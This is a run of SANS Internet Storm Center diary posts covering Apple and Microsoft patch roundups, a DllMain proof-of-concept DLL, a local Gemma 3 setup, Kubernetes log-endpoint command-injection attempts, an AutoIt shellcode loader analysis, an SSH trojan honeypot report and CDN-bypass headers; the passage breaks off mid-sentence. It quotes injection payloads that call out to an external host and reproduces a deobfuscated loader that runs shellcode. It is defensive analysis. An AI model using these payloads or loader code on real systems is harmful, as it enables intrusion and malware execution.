Never release on a Friday. Unless you are Apple :) Apple released updates for all of its operating systems today. These updates were expected for this week, a second release candidate being released on Monday made me think that they may wait a week to push the final product. This is a "step update" for the operating systems, including various small feature updates. Across Apple's operating systems, the update fixes a total of 48 vulnerabilities. Two of the vulnerabilities are already actively exploited in targeted attacks.

Both exploited vulnerabilities affect WebKit and, with that, are exploitable by visiting a malicious webpage. WebKit is used by various software that displays HTML pages, not just Safari. The first vulnerability, CVE-2025-14174, is a use-after-free vulnerability. The second issue, CVE-2025-43529, allows for memory corruption. Apple does not state it in their brief advisories, but both issues can likely be used to execute arbitrary code. It is not clear if the vulnerabilities will also lead to sandbox escape.

In addition to the patches for the operating system, Apple also fixed its video processing tool "Compressor". The patched vulnerability allows for remote code execution by an attacker on the local network. Compressor is an add-on software that is not included in the OS install. I doubt many users aside from video editors have it installed.

 

 

iOS 26.2 and iPadOS 26.2	iOS 18.7.3 and iPadOS 18.7.3	macOS Tahoe 26.2	macOS Sequoia 15.7.3	macOS Sonoma 14.8.3	tvOS 26.2	watchOS 26.2	visionOS 26.2
CVE-2024-8906: A download's origin may be incorrectly associated. Affects Safari Downloads
		x
CVE-2025-14174: Processing maliciously crafted web content may lead to memory corruption. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-43529 was also issued in response to this report.. Affects WebKit
x	x	x			x	x	x
CVE-2025-43320: An app may be able to bypass launch constraint protections and execute malicious code with elevated privileges. Affects AppleMobileFileIntegrity
			x
CVE-2025-43410: An attacker with physical access may be able to view deleted notes. Affects Notes
		x
CVE-2025-43416: An app may be able to access protected user data. Affects sudo
		x	x	x
CVE-2025-43428: Photos in the Hidden Photos Album may be viewed without authentication. Affects Photos
x		x					x
CVE-2025-43463: An app may be able to access sensitive user data. Affects StorageKit
			x	x
CVE-2025-43475: An app may be able to access user-sensitive data. Affects MediaExperience
x
CVE-2025-43482: An app may be able to cause a denial-of-service. Affects Audio
		x	x	x
CVE-2025-43501: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit
x	x	x					x
CVE-2025-43509: An app may be able to access sensitive user data. Affects Networking
		x	x	x
CVE-2025-43511: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit Web Inspector
x		x				x	x
CVE-2025-43512: An app may be able to elevate privileges. Affects Kernel
	x	x	x	x
CVE-2025-43513: An app may be able to read sensitive location information. Affects MDM Configuration Tools
		x	x	x
CVE-2025-43514: An app may be able to access protected user data. Affects Siri
		x
CVE-2025-43516: A user with Voice Control enabled may be able to transcribe another user's activity. Affects Voice Control
		x	x	x
CVE-2025-43517: An app may be able to access protected user data. Affects Call History
		x	x	x
CVE-2025-43518: An app may be able to inappropriately access files through the spellcheck API. Affects Foundation
x		x	x	x		x
CVE-2025-43519: An app may be able to access sensitive user data. Affects AppleMobileFileIntegrity
		x	x	x
CVE-2025-43521: An app may be able to access sensitive user data. Affects AppleMobileFileIntegrity
		x	x
CVE-2025-43522: An app may be able to access user-sensitive data. Affects AppleMobileFileIntegrity
		x	x
CVE-2025-43523: An app may be able to access sensitive user data. Affects AppleMobileFileIntegrity
			x
CVE-2025-43526: On a Mac with Lockdown Mode enabled, web content opened via a file URL may be able to use Web APIs that should be restricted. Affects Safari
		x
CVE-2025-43527: An app may be able to gain root privileges. Affects StorageKit
		x	x
CVE-2025-43529: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-14174 was also issued in response to this report.. Affects WebKit
x	x	x			x	x	x
CVE-2025-43530: An app may be able to access sensitive user data. Affects Settings
	x	x	x	x
CVE-2025-43531: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit
x	x	x			x	x	x
CVE-2025-43532: Processing malicious data may lead to unexpected app termination. Affects Foundation
x	x	x	x	x	x	x	x
CVE-2025-43533: A malicious HID device may cause an unexpected process crash. Affects Multi-Touch
x		x			x	x	x
CVE-2025-43535: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit
x	x	x					x
CVE-2025-43536: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit
x	x	x
CVE-2025-43538: An app may be able to access sensitive user data. Affects Screen Time
x	x	x		x		x	x
CVE-2025-43539: Processing a file may lead to memory corruption. Affects AppleJPEG
x	x	x	x	x	x	x	x
CVE-2025-43541: Processing maliciously crafted web content may lead to an unexpected Safari crash. Affects WebKit
x	x	x					x
CVE-2025-43542: Password fields may be unintentionally revealed when remotely controlling a device over FaceTime. Affects FaceTime
x	x	x	x				x
CVE-2025-46276: An app may be able to access sensitive user data. Affects Messages
x	x	x	x	x		x	x
CVE-2025-46277: An app may be able to access a user's Safari history. Affects Screen Time
x		x				x
CVE-2025-46278: An app may be able to access protected user data. Affects Game Center
		x
CVE-2025-46279: An app may be able to identify what other apps a user has installed. Affects Icons
x	x	x			x	x	x
CVE-2025-46281: An app may be able to break out of its sandbox. Affects File Bookmark
		x
CVE-2025-46282: An app may be able to access sensitive user data. Affects WebKit
		x
CVE-2025-46283: An app may be able to access sensitive user data. Affects CoreServices
		x
CVE-2025-46285: An app may be able to gain root privileges. Affects Kernel
x	x	x	x	x	x	x	x
CVE-2025-46287: An attacker may be able to spoof their FaceTime caller ID. Affects Calling Framework
x	x	x	x	x		x	x
CVE-2025-46288: An app may be able to access sensitive payment tokens. Affects App Store
x		x				x	x
CVE-2025-46289: An app may be able to access protected user data. Affects AppSandbox
		x	x	x
CVE-2025-46291: An app may bypass Gatekeeper checks. Affects LaunchServices
		x
CVE-2025-46292: An app may be able to access user-sensitive data. Affects Telephony
x	x

 

 

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

In the Microsoft Windows ecosystem, DLLs (Dynamic Load Libraries) are PE files like regular programs. One of the main differences is that they export functions that can be called by programs that load them. By example, to call RegOpenKeyExA(), the program must first load the ADVAPI32.dll. A PE files has a lot of headers (metadata) that contain useful information used by the loader to prepare the execution in memory. One of them is the EntryPoint, it contains the (relative virtual) address where the program will start to execute.

In case of a DLL, there is also an entry point called logically the DLLEntryPoint. The code located at this address will be executed when the library is (un)loaded. The function executed is called DllMain()[1] and expects three parameters:

BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL, 
  _In_ DWORD fdwReason, 
  _In_ LPVOID lpvReserved
);

The second parmeter indicates why the DLL entry-point function is being called:

• DLL_PROCESS_DETACH (0)
• DLL_PROCESS_ATTACH (1)
• DLL_THREAD_ATTACH (2)
• DLL_THREAD_DETACH (3)

Note that this function is optional but it is usually implemented to prepare the environment used by the DLL like loading resources, creating variables, etc... Microsoft recommends also to avoid performing sensitive actions at that location.

Many maware are deployed as DLLs because it's more challenging to detect. The tool regsvr32.exe[2] is a classic attack vector because it helps to register a DLL in the system (such DLL will implement a DllRegisterServer() function). Another tool is rundll32.exe[3] that allows to call a function provided by a DLL:

C:\> rundll32.exe mydll.dll,myExportedFunction

When a suspicious DLL is being investigated, the first reflex of many Reverse Engineers is to look at the exported function(s) but don't pay attention to the entrypoint. They look at the export table:

This DllMain() is a very nice place where threat actors could store malicious code that will probably remains below the radar if you don’t know that this EntryPoint exists. I wrote a proof-of-concept DLL that executes some code once loaded (it will just pop up a calc.exe). Here is the simple code:

// evildll.cpp
#include <windows.h>
#pragma comment(lib, "user32.lib")

extern "C" __declspec(dllexport) void SafeFunction() {
    // Simple exported function
    MessageBoxA(NULL, "SafeFunction() was called!", "evildll", MB_OK | MB_ICONINFORMATION);
}

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD  ul_reason_for_call,
                      LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
        {
            // Optional: disable thread notifications to reduce overhead
            DisableThreadLibraryCalls(hModule);

            STARTUPINFOA si{};
            PROCESS_INFORMATION pi{};
            si.cb = sizeof(si);
            char cmdLine[] = "calc.exe";

            BOOL ok = CreateProcessA(NULL, cmdLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
            if (ok) {
                CloseHandle(pi.hThread);
                CloseHandle(pi.hProcess);
            } else {
                // optional: GetLastError() handling/logging
            }
            break;
        }
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

And now, a simple program used to load my DLL:

// loader.cpp
#include <windows.h>
#include <stdio.h>

typedef void (*SAFEFUNC)();

int main()
{
    // Load the DLL
    HMODULE hDll = LoadLibraryA("evildll.dll");
    if (!hDll)
    {
        printf("LoadLibrary failed (error %lu)\n", GetLastError());
        return 1;
    }
    printf("[+] DLL loaded successfully\n");

    // Resolve the function
    SAFEFUNC SafeFunction = (SAFEFUNC)GetProcAddress(hDll, "SafeFunction");
    if (!SafeFunction)
    {
        printf("GetProcAddress failed (error %lu)\n", GetLastError());
        FreeLibrary(hDll);
        return 1;
    }
    printf("[+] SafeFunction() resolved\n");

    // Call the function
    SafeFunction();

    // Unload DLL
    FreeLibrary(hDll);

    return 0;
}

Let's compile the DLL, the loader and execute it:

When the DLL is loaded with LoadLibraryA(), the calc.exe process is spawned automatically, even if no DLL function is invoked!

Conclusion: Always have a quick look at the DLL entry point!

[1] https://learn.microsoft.com/en-us/windows/win32/dlls/dllmain
[2] https://attack.mitre.org/techniques/T1218/010/
[3] https://attack.mitre.org/techniques/T1218/011/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Several months ago, I got a Nucbox K8 Plus minicomputer to use as a Proxmox 9 server. At the time of this acquisition, I didn't realize this minicomputer had an artificial intelligence (AI) engine [1] build in the CPU that could be used to run AI applications locally. A coworker recommended that I try Google Gemma 3 as a local AI open model to work with my use cases.

"Gemma is a family of generative artificial intelligence (AI) models and you can use them in a wide variety of generation tasks, including question answering, summarization, and reasoning." [2], a review of the Gemma 3 key features is also posted on this page. This page [3] lists the minimum requirements for the 5 Gemma 3 models 270M, 1B, 4B, 12B, and 27B.

Default Open WebUI

My Setup with Open WebUI

• OS is a Linux Container (LXC) Ubuntu 24.04
• Ollama with gemma3:12b [4]
• Open WebUI [5]

Installing Ollama with Gemma 3

I used these steps to get Gemma setup. First review the requirements for RAM [3] before deciding with Gemma 3 model to install. You can start small (i.e. 4B or smaller) for testing before using a larger model. I'm using  4B and 12B with 16 GB of RAM with my installation. 

If you want to test some queries before installing the WebUI, this last command will open the interpreter:

ollama run gemma3:4b

Since I have a Ryzen 7 CPU, my next step was to install the admgpu [7] software to use the AI features of the CPU. The last step is to install the graphical interface to work from a browser using the Open WebUI [5] and there are several models listed here to get the WebUI running. I had to try a few combinations; in the end this is what I used:

sudo docker run -d -p 80:8080 -v ollama:/root/.ollama --add-host=host.docker.internal:host-gateway -v open-webui:/app/backend/data --name open-webui --restart always ghcr.io/open-webui/open-webui:main

Bugs in Proxmox 9 for LXC and AppArmor

For the Linux Container to run correctly, I had to edit the edit the LXC config file (114 is the container number) and add those two lines:

vi /etc/pve/lxc/114.conf

• lxc.apparmor.profile: unconfined
• lxc.mount.entry: /dev/null sys/module/apparmor/parameters/enabled none bind 0 0

And it may also be necessary to add this as well in the sudo command before installing the docker: --security-opt apparmor:unconfined

Login WebUI Interface

After the installation of the WebUI, you need to create the first admin account before being able to login.My first query asked my AI to describe the IPv4 header:

Gemma 3 offers the ability to work with large files with its 128K context, work with images and has multilingual support which is practical if you know multiple languages. Finally, it can run locally in PC, laptop and smartphone on a single GPU or TPU and smaller devices. If you have experience using Gemma 3, what are the use cases you are using it? You can add your comments in our contact form.

[1] https://www.amd.com/en/products/processors/laptop/ryzen/8000-series/amd-ryzen-7-8845hs.html
[2] https://ai.google.dev/gemma/docs/core
[3] https://ai.google.dev/gemma/docs/core#sizes
[4] https://deepmind.google/models/gemma/gemma-3/
[5] https://github.com/open-webui/open-webui
[6] https://ai.google.dev/gemma/docs/integrations/ollama?utm_source=deepmind.google&utm_medium=referral&utm_campaign=gdm&utm_content
[7] https://rocm.docs.amd.com/projects/radeon-ryzen/en/latest/docs/install/installryz/native_linux/install-ryzen.html
[8] https://forum.proxmox.com/threads/priviledge-container-disabling-apparmor-does-not-work.122168/
[9] https://blog.ktz.me/apparmors-awkward-aftermath-atop-proxmox-9/
[10] https://docs.openwebui.com/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Last year, Kubernetes fixed a command injection vulnerability in the Kubernetes NodeLogQuery feature (%%cve:2024-9042%%) [1]. To exploit the vulnerability, several conditions had to be met:

• The vulnerable node had to run Windows
• The attacker had to have permissions to read logs
• The NogeLogQuery feature had to be enabled (at least at the time, it was in "Beta" and not enabled by default)

The sample exploits posted at the time passed the OS command as a GET parameter. For example [2]

curl  "<Kubernetes API Proxy server IP>/api/v1/nodes/<NODE name>/proxy/logs/?query=nssm&pattern=’\$(Start-process cmd)’"

The exploit uses '$(oscommand)' as a "pattern", and sends a query to the "/logs/" endpoint. Overall, a classic OS command injection issue.

Starting a couple of days ago, I spotted some requests sent to our honeypots that followed a similar pattern. It isn't clear to me if this is essentially the same vulnerability or something completely different. The exploit used the "logs" endpoint and achieves command injection via the "$(oscommand)" pattern, but this time around it includes the command as part of the path. There is a chance that something like this will work, as path elements are often used by APIs.

Google suggests CVE-2024-9042, but this may be something completely different. Please let me know if you have any ideas. Here is a sample request as captured by a honeypot:

GET /$(nslookup%20-q=cname%20[redacted].bxss.me||curl%20[redacted].bxss.me)/logs/
accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
accept-encoding: gzip,deflate
user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
host: [redacted]
connection: Keep-alive

 

[1] https://www.openwall.com/lists/oss-security/2025/01/16/1
[2] https://www.akamai.com/blog/security-research/kubernetes-log-query-rce-windows

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

This release addresses 57 vulnerabilities. 3 of these vulnerabilities are rated critical. One vulnerability was already exploited, and two were publicly disclosed before the patch was released.

CVE-2025-62221: This privilege escalation vulnerability in the Microsoft Cloud Files Mini Filters driver is already being exploited.

CVE-2025-54100: A PowerShell script using Invoke-WebRequest may execute scripts that are included in the response. This is what Invoke-WebRequest is supposed to do. The patch adds a warning suggesting adding the -UseBasicParsing parameter to avoid executing scripts.

CVE-2025-64671: The GitHub Copilot plugin for JetBrains may lead to remote code execution. This is overall an issue with many AI code assistance as they have far-reaching access to the IDE.

The critical vulnerabilities are remote code execution vulnerabilities in Office and Outlook.

 

Description
CVE	Disclosed	Exploited	Exploitability (old versions)	current version	Severity	CVSS Base (AVG)	CVSS Temporal (AVG)
Application Information Service Elevation of Privilege Vulnerability
%%cve:2025-62572%%	No	No	-	-	Important	7.8	6.8
Azure Monitor Agent Remote Code Execution Vulnerability
%%cve:2025-62550%%	No	No	-	-	Important	8.8	7.7
DirectX Graphics Kernel Denial of Service Vulnerability
%%cve:2025-62463%%	No	No	-	-	Important	6.5	5.7
%%cve:2025-62465%%	No	No	-	-	Important	6.5	5.7
DirectX Graphics Kernel Elevation of Privilege Vulnerability
%%cve:2025-62573%%	No	No	-	-	Important	7.0	6.1
GitHub Copilot for Jetbrains Remote Code Execution Vulnerability
%%cve:2025-64671%%	Yes	No	-	-	Important	8.4	7.3
Microsoft Access Remote Code Execution Vulnerability
%%cve:2025-62552%%	No	No	-	-	Important	7.8	6.8
Microsoft Brokering File System Elevation of Privilege Vulnerability
%%cve:2025-62469%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-62569%%	No	No	-	-	Important	7.0	6.1
Microsoft Edge (Chromium-based) for Mac Spoofing Vulnerability
%%cve:2025-62223%%	No	No	-	-	Low	4.3	3.8
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2025-62561%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62563%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62564%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62553%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62556%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62560%%	No	No	-	-	Important	7.8	6.8
Microsoft Exchange Server Elevation of Privilege Vulnerability
%%cve:2025-64666%%	No	No	-	-	Important	7.5	6.5
Microsoft Exchange Server Spoofing Vulnerability
%%cve:2025-64667%%	No	No	-	-	Important	5.3	4.6
Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability
%%cve:2025-62455%%	No	No	-	-	Important	7.8	6.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2025-62554%%	No	No	-	-	Critical	8.4	7.3
%%cve:2025-62557%%	No	No	-	-	Critical	8.4	7.3
Microsoft Outlook Remote Code Execution Vulnerability
%%cve:2025-62562%%	No	No	-	-	Critical	7.8	6.8
Microsoft SharePoint Server Spoofing Vulnerability
%%cve:2025-64672%%	No	No	-	-	Important	8.8	7.7
Microsoft Word Remote Code Execution Vulnerability
%%cve:2025-62555%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-62558%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62559%%	No	No	-	-	Important	7.8	6.8
PowerShell Remote Code Execution Vulnerability
%%cve:2025-54100%%	Yes	No	-	-	Important	7.8	6.8
Win32k Elevation of Privilege Vulnerability
%%cve:2025-62458%%	No	No	-	-	Important	7.8	6.8
Windows Camera Frame Server Monitor Information Disclosure Vulnerability
%%cve:2025-62570%%	No	No	-	-	Important	7.1	6.2
Windows Client-Side Caching Elevation of Privilege Vulnerability
%%cve:2025-62466%%	No	No	-	-	Important	7.8	6.8
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
%%cve:2025-62454%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62457%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62221%%	No	Yes	-	-	Important	7.8	6.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2025-62470%%	No	No	-	-	Important	7.8	6.8
Windows DWM Core Library Elevation of Privilege Vulnerability
%%cve:2025-64679%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-64680%%	No	No	-	-	Important	7.8	6.8
Windows Defender Firewall Service Information Disclosure Vulnerability
%%cve:2025-62468%%	No	No	-	-	Important	4.4	3.9
Windows DirectX Information Disclosure Vulnerability
%%cve:2025-64670%%	No	No	-	-	Important	6.5	5.7
Windows File Explorer Elevation of Privilege Vulnerability
%%cve:2025-64658%%	No	No	-	-	Important	7.5	6.5
%%cve:2025-62565%%	No	No	-	-	Important	7.3	6.4
Windows Hyper-V Denial of Service Vulnerability
%%cve:2025-62567%%	No	No	-	-	Important	5.3	4.6
Windows Installer Elevation of Privilege Vulnerability
%%cve:2025-62571%%	No	No	-	-	Important	7.8	6.8
Windows Projected File System Elevation of Privilege Vulnerability
%%cve:2025-62461%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62462%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62464%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-55233%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62467%%	No	No	-	-	Important	7.8	6.8
Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
%%cve:2025-62472%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62474%%	No	No	-	-	Important	7.8	6.8
Windows Resilient File System (ReFS) Remote Code Execution Vulnerability
%%cve:2025-62456%%	No	No	-	-	Important	8.8	7.7
Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
%%cve:2025-62473%%	No	No	-	-	Important	6.5	5.7
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2025-62549%%	No	No	-	-	Important	8.8	7.7
%%cve:2025-64678%%	No	No	-	-	Important	8.8	7.7
Windows Shell Elevation of Privilege Vulnerability
%%cve:2025-64661%%	No	No	-	-	Important	7.8	6.8
Windows Storage VSP Driver Elevation of Privilege Vulnerability
%%cve:2025-64673%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59516%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59517%%	No	No	-	-	Important	7.8	6.8

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

AutoIT3[1] is a powerful language that helps to built nice applications for Windows environments, mainly to automate tasks. If it looks pretty old, the latest version was released last September and it remains popular amongst developers, for the good… or the bad! Malware written in AutoIt3 has existed since the late 2000s, when attackers realized that the language was easy to learn (close to basic) but can also compiled into standalone PE files! From a malware point of view, such executables make an extended use of packed data, making them more stealthy.

If it became less popular, AutoIT3 is still used by some attackers. I found a sample yesterday that (ab)use a nice feature of the language. The sample was delivered in a ZIP archive, containing a PE fille: ENQ-2548871-PO-AYPC-352-25-UN-01162.exe (SHA256:1e75512b85b8ad27966ea850b69290bc18cc010bcb4f0e1ef119b82c99ca96c0). The file has a VT score of 33/72[2].

The technique used by the threat actor relies on the function FileInstall()[3]. Its purpose is to to include a file into an executed script but… the behavior is subtle and depends on how the script is run. The script call this code:

FileInstall ( "inhumation" , @TempDir & "\inhumation" , 1 )

How does it work?

• If the script is parsed, the source file must exist all the time.
• If the script is compiled, the file must exist at compile time only! (It is embedded into the PE file)

When the payload was executed, indeed, it created the file ‘inhumation’ in %TEMP%!

Clasically, the remaining code is obfuscated. The magic is perfomed with a simple function LGYJSYH():

Func LGYJSYH ( $LVRVBGKY )
    Local $PYYTLPGF = ""
    For $WVILGLOS = 1 To StringLen ( $LVRVBGKY )
        Local $NCMTXMB = Asc ( StringMid ( $LVRVBGKY , $WVILGLOS , 1 ) )
        $PYYTLPGF &= Chr ( $NCMTXMB - ( 1 ^ $WVILGLOS ) )
    Next
    Return $PYYTLPGF
EndFunc

The purpose is very simple: it parses a string, and for every character, if converts it with the previous one in the ASCII table (-1). Don't be fooled, the "^" does not reveal some XOR manipulation. In AutoIT, "^" is exponentiation!

In Python, we should have something like this:

def LGYJSYH(s):
    return "".join(chr(ord(c) - 1) for c in s)

Example:

>>> def OZTTVUH(s):
...     return "".join(chr(ord(c) - 1) for c in s)
...
>>> OZTTVUH("lfsofm43")
'kernel32'

Two files are loaded via FileInstall() and one of them is an obfuscated shellcode.

Here is the technique used by the sample to load and execute it:
(The code has been deobfuscated for easier reading)

; Unpack the shellcode on disk
FileInstall ( "buncal" , @TempDir & "\buncal" , 1 )

; Read the shellcode file content
$FMMKSJE = Execute ( "lgyjsyh(FileRead(@TempDir “”\buncal"))" )

; Get the shellcode length
$IXWCTFHCT = BinaryLen ( $FMMKSJE )

; Allocate executable memorty (0x40) to contain the shellcode
$PUJFJJN = DllCall ( “kernel32” , “ptr”, “VirtualAlloc”, “dword" , “0” , “dword”, $IXWCTFHCT, “dword”, “0x3000”, “dword”, “0x40”))[0]

; Prepate the allocated memory as a DLL structure
$QMDAZCZGFO = DllStructCreate ( “byte [“ & $IXWCTFHCT & “]” ) , $PUJFJJN )

; Loads the shellcode in memory
DllStructSetData ( $QMDAZCZGFO , 1 , $FMMKSJE )

; Launch the shellcode!
DllCall ( “user32.dll” , “ptr”, “CallWindowProc”, “ptr”, $PUJFJJN + 9296 , “ptr”, 0 , “ptr”,, 0 , “ptr”, 0 , “ptr”, 0 )

I already covered the use of CallWindowProc() to load a shell code in a previous diary[4]

There is ongoing wave of such samples. I already spotted two samples that use the same technique:

• "ENQ-2548871-PO-AYPC-352-25-UN-01162.exe" (SHA256:1e75512b85b8ad27966ea850b69290bc18cc010bcb4f0e1ef119b82c99ca96c0)
  • Delivers a Quasar RAT:
• ENQ_DB9002M_ORDER_M24093_2025.exe (SHA256:7eb8ae8f1216a377da6ccd0cee0b21f2700e9bbc46ae3ebfa876e70296aa4539)
  • Delivers a Phantom stealer

Conclusion: Keep an eye on FileInstall() in AutoIT3 scripts!

[1] https://www.autoitscript.com/site/
[2] https://www.virustotal.com/gui/file/1e75512b85b8ad27966ea850b69290bc18cc010bcb4f0e1ef119b82c99ca96c0
[3] https://www.autoitscript.com/autoit3/docs/functions/FileInstall.htm
[4] https://isc.sans.edu/diary/Interesting+Technique+to+Launch+a+Shellcode/32238

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

[This is a Guest Diary by Jackie Nguyen, an ISC intern as part of the SANS.edu BACS program]

The ISC internship didn't just teach me about security, it changed how I thought about threats entirely. There's something intriguing about watching live attacks materialize on your DShield Honeypot, knowing that somewhere across the world, an attacker just made a move. And the feedback loop of writing detailed attack observations, then having experienced analysts critique and refine your analysis? That's where real learning happens. One attack observation in particular stands out as a perfect example of what makes this internship so powerful. Let me show you what I discovered!

The Beginning…

On November 10, 2025, my honeypot captured very interesting activity that really demonstrates how evolved modern threat actors are getting. What initially appeared to be a simple, but successful SSH brute force attempt quickly revealed itself as something far more concerning, a deployment of an advanced trojan designed for long-term persistence and evasion.

What happened?

Suspicious activity was detected when the IP address 103[.]148[.]195[.]161 successfully SSH’d into my honeypot using the credentials username “root” and password “linux”. The bad actor maintained access to the honeypot for 1 minute and 45 seconds but ultimately ran no commands. Instead, the attacker uploaded a single file, a trojan binary named “sshd” designed to evade security detections by pretending to be the OpenSSH daemon. It was an Executable and Linkable Format (ELF) binary (7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d) that was classified as malicious by VirusTotal and Hybrid-Analysis.

We won’t be able to see what the Trojan did on my honeypot at this time, however, I found the hash on Hybrid-Analysis and got a good idea of what the trojan does.

A screenshot of the cowrie output using Jesse La Grew’s cowrieprocessor [4]

Trojan File Analysis

MITRE ATT&CK MAPPING

•    T1078 - Valid Accounts
•    T1110.001 - Brute Force
•    T1204.002 - User Execution
•    T1036.005 - Masquerading
•    T1554 - Compromise Client Software Binary
•    T1548.001 - Abuse Elevation Control Mechanism
•    T1027 - Obfuscated Files or Information
•    T1497 - Virtualization/Sandbox Evasion
•    T1480 - Execution Guardrails
•    T1003.008 - OS Credential Dumping

Prevent Similar Attacks

1.    Disable Password Authentication and utilize SSH keys instead
2.    IP Allowlisting
3.    IDS/IPS/EDR
4.    Threat Hunting
5.    MFA

What does this show?

This really shows how much effort sophisticated attackers would put in for long-term persistence and advanced evasion. Attacks from a government IP address doesn’t always mean it’s the government; it more than likely would mean that they were compromised. If you think about it logically, why would a nation-state threat actor use their actual government IP address to execute attacks?

Importance?

It’s important when working on a high performing security team to not attribute attacks to the wrong threat actor. Politically, this may cause problems, especially if the company you’re working for has a large media presence. Problems including wrongful retaliation and political tension could arise from making this mistake.

This attack also shows how threat actors use legitimate processes to blend in with normal ones. We must remember that the goal of this attacker is most likely long-term so they will do everything they can to evade your defenses.

Actionable Intelligence for Defenders

Threat hunting is a critical part of any security program and having concrete Indicators of Compromise (IOCs) like file hashes, malicious IP addresses, and more would give teams actionable intelligence to use immediately. This observation also helps defenders understand what to look for. Brief sessions without commands can be just as dangerous as those with suspicious activity.

Key Takeaways

This attack really shows how threat actors are getting more sophisticated. By uploading a legitimate looking trojan instead of running commands, the attacker could have avoided the typical red flags most monitoring tools look for. The use of a government IP address also teaches us an important lesson not to immediately jump to conclusions solely based on IP block owner since it might have been compromised. For analysts out there, what seems to be a quiet session can sometimes be the most dangerous.

[1] https://www.virustotal.com/gui/file/7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d/detection
[2 ]https://www.abuseipdb.com/whois/103.148.195.161
[3] https://hybridanalysis.com/sample/7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d/6542c8b6abeb51c5ee0bbf2a
[4] https://github.com/jslagrew/cowrieprocessor
[5] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Currently, in order to provide basic DDoS protection and filter aggressive bots, some form of Content Delivery Network (CDN) is usually the simplest and most cost-effective way to protect a web application. In a typical setup, DNS is used to point clients to the CDN, and the CDN will then forward the request to the actual web server. There are a number of companies offering services like this, and cloud providers will usually have solutions like this as well.

However, this setup comes with a significant weakness: If an attacker can identify the IP address of the actual web server, they are often able to bypass the CDN and reach the web server directly. There are a few ways to prevent this. Depending on the CDN selected, it may be possible to allow access only from the CDN's IP address space. However, for some of the larger providers, this list of addresses may be large and very dynamic. Another option is to add custom headers. Some CDNs offer special custom headers with randomized values to identify requests that passed through the CDN. A less secure (lazier?) option is to look for any header that identifies the CDN. This last option should be avoided, as attackers can easily include this header.

In recent days, our honeypots detected an uptick of requests that included these CDN-related headers, indicating that attackers may attempt to bypass this protection. For example:

Cf-Warp-Tag-Id

This header started showing up yesterday and is associated with Cloudflare's "Warp" VPN service. The scans do include a random-looking value, but may count on the value to either not be verified, or the request actually went through the Cloudflare Warp VPN to obfuscate its source.

X-Fastly-Request-Id

As the name implies, this header is associated with the Fastly CDN. It started showing up in our data on November 20th.

X-Akamai-Transformed

A header added by Akamai. Also started showing up on November 20th (so are the remaining headers)

X-T0Ken-Inf0

Not sure what this header is used for (any ideas? Let me know). It looks like it could contain some form of authentication token, but the "l33t spelling" is odd.

x-sfdc-request-id
x-sfdc-lds-endpoints

These headers are used by Salesforce to track requests. 

Around the same time, we also started seeing a lot of headers starting with the string "Xiao9-", but I have no idea what they are used for. If anybody has any ideas, please let me know :)

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

[This is a Guest Diary by James Woodworth, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].

